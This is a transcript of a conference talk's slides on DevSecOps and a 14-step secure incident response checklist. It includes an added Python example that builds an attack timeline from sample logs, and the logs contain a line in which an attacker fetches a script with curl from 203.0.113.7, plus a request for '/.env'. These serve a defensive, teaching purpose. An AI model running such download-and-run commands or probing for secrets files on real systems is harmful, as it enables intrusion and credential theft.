DevSecOps and Secure Incident Response

A presentation at Pulumi Cloud Engineering Summit in October 2021 by Quintessence Anx

Slide 1

DevSecOps and Secure Incident Response @QuintessenceAnx Developer Advocate @ PagerDuty

Slide 2

DevSecOps and Secure Incident Response @QuintessenceAnx Developer Advocate @ PagerDuty

Slide 3

Don’t panic

Slide 4

The Now

Slide 5

Slide 6

Software Development Life Cycle

Slide 7

Vault over “The Wall” for Security Review

Slide 8

Software Development Life Cycle Security

Slide 9

Slide 10

🤔

Slide 11

DevSecOps

Slide 12

What is DevSecOps?

Slide 13

DevSecOps stands for development, security, and operations. DevSecOps seeks to integrate security across the SDLC and streamline the workflows between dev, sec, and ops.

Slide 14

What DevSecOps is not

Slide 15

DevSecOps is not replacing security with dev and/or ops, or expecting dev and/or ops to become security specialists, or expecting security to become devs and/or ops.

Slide 16

Phew.

Slide 17

Slide 18

How?

Slide 19

The Secure SDLC + Shifting Left

Slide 20

Slide 21

Slide 22

Slide 23

SecOps Activities
• Secure architecture / design
• Threat modeling
• Testing, e.g. SAST and DAST
• Scanning images and dependencies
• Fuzzing
• And more!

Slide 24

Shift Left

Slide 25

Slide 26

How?

Slide 27

Cultural Support

Slide 28

Humans.

Slide 29

Sharp end: High Risk, Low Power
Blunt end: Low Risk, High Power

Slide 30

Exec Buy-in

Slide 31

Never trick staff, ever.

Slide 32

Training

Slide 33

Full Service Ownership

Slide 34

Capture the Flag

Slide 35

Threat Modeling

Slide 36

🚨

Slide 37

Secure Incident Response

Slide 38

1. Stop the attack in progress.
2. Cut off the attack vector.
3. Assemble the response team.
4. Isolate affected instances.
5. Identify timeline of attack.
6. Identify compromised data.
7. Assess risk to other systems.
8. Assess risk of re-attack.
9. Apply additional mitigations, make changes to monitoring, etc.
10. Forensic analysis of compromised systems.
11. Internal communication.
12. Involve law enforcement.
13. Reach out to external parties that may have been used as vector for attack.
14. External communication.
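Step 5, identifying the timeline of the attack, usually means merging logs that disagree about time. The following is an added example, not code from the talk or from PagerDuty: it normalises three constructed log formats (a syslog-style auth log in an assumed local timezone of UTC-4, an nginx access log with an explicit offset, and an ISO-8601 cloud audit event) to UTC and orders every line that mentions an indicator, here the constructed documentation-range address 203.0.113.7.

```python
"""Attack-timeline builder for step 5 of the checklist (added example).

Not code from the talk or from PagerDuty. All log lines are constructed and
imitate an sshd auth log (syslog: local time, no year), an nginx access log
(explicit UTC offset) and a cloud audit event (ISO-8601 Zulu). Everything is
normalised to UTC before sorting, so order reflects events, not wall clocks.
"""
import re
from datetime import datetime, timezone, timedelta

LOCAL_TZ = timezone(timedelta(hours=-4))  # assumed host timezone for auth.log
YEAR = 2021                                # syslog lines carry no year

# Constructed sample lines; 203.0.113.7 is from the documentation range.
SAMPLE_LOGS = {
    "auth.log": [
        "Oct 12 14:03:11 web1 sshd[812]: Accepted password for deploy from 203.0.113.7 port 51022",
        "Oct 12 14:05:40 web1 sudo: deploy : COMMAND=/usr/bin/curl http://203.0.113.7/setup.sh",
    ],
    "access.log": [
        '203.0.113.7 - - [12/Oct/2021:17:58:02 +0000] "GET /.env HTTP/1.1" 200 512',
    ],
    "cloudtrail.json": [
        '{"eventTime":"2021-10-12T18:09:55Z","eventName":"CreateAccessKey","sourceIPAddress":"203.0.113.7"}',
    ],
}

def parse(source, line):
    """Return (utc_datetime, source, line), or None if no timestamp is recognised."""
    if m := re.match(r"(\w{3} +\d+ \d\d:\d\d:\d\d)", line):                          # syslog
        ts = datetime.strptime(f"{YEAR} {m[1]}", "%Y %b %d %H:%M:%S").replace(tzinfo=LOCAL_TZ)
    elif m := re.search(r"\[(\d\d/\w{3}/\d{4}:\d\d:\d\d:\d\d [+-]\d{4})\]", line):  # nginx
        ts = datetime.strptime(m[1], "%d/%b/%Y:%H:%M:%S %z")
    elif m := re.search(r'"eventTime":"([^"]+)Z"', line):                             # ISO-8601 Zulu
        ts = datetime.fromisoformat(m[1]).replace(tzinfo=timezone.utc)
    else:
        return None
    return ts.astimezone(timezone.utc), source, line

def build_timeline(logs, indicator):
    """Merge every line mentioning `indicator` into one UTC-ordered list."""
    events = [e for src, lines in logs.items() for ln in lines
              if indicator in ln and (e := parse(src, ln)) is not None]
    return sorted(events, key=lambda e: e[0])

def first_seen(logs, indicator):
    """Earliest UTC time the indicator appears in any source (ISO-8601), or None."""
    timeline = build_timeline(logs, indicator)
    return timeline[0][0].isoformat() if timeline else None
```

Sorted naively by the wall-clock strings, the 14:03 SSH login would appear to precede the 17:58 request for `/.env`; after normalisation the credential exposure correctly comes first.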

Slide 39

Stop the attack in progress

Slide 40

Cut off the attack vector

Slide 41

Assemble the response team

Slide 42

Isolate the affected instances

Slide 43

Identify timeline of the attack

Slide 44

Identify compromised data

Slide 45

Assess risk to other systems

Slide 46

Assess risk of re-attack

Slide 47

Apply additional mitigations, additions to monitoring, etc.

Slide 48

Forensic analysis of compromised systems

Slide 49

Internal communication

Slide 50

Involve law enforcement

Slide 51

Reach out to external parties that may have been used as attack vectors

Slide 52

External communication

Slide 53

1. Stop the attack in progress.
2. Cut off the attack vector.
3. Assemble the response team.
4. Isolate affected instances.
5. Identify timeline of attack.
6. Identify compromised data.
7. Assess risk to other systems.
8. Assess risk of re-attack.
9. Apply additional mitigations, make changes to monitoring, etc.
10. Forensic analysis of compromised systems.
11. Internal communication.
12. Involve law enforcement.
13. Reach out to external parties that may have been used as vector for attack.
14. External communication.

Slide 54

Resources & References noti.st/quintessence

Slide 55

Questions? Quintessence Anx Developer Advocate noti.st/quintessence @QuintessenceAnx

Slide 56

Brand Colors
• PagerDuty Green Hex #06ac38
• Dark Green Hex #005a24
• Clay Hex #94b2a5
• Orange Hex #fa640a
• Peach Hex #ffc5b2
• Yellow Hex #ffe664
• Dark Blue Hex #00607f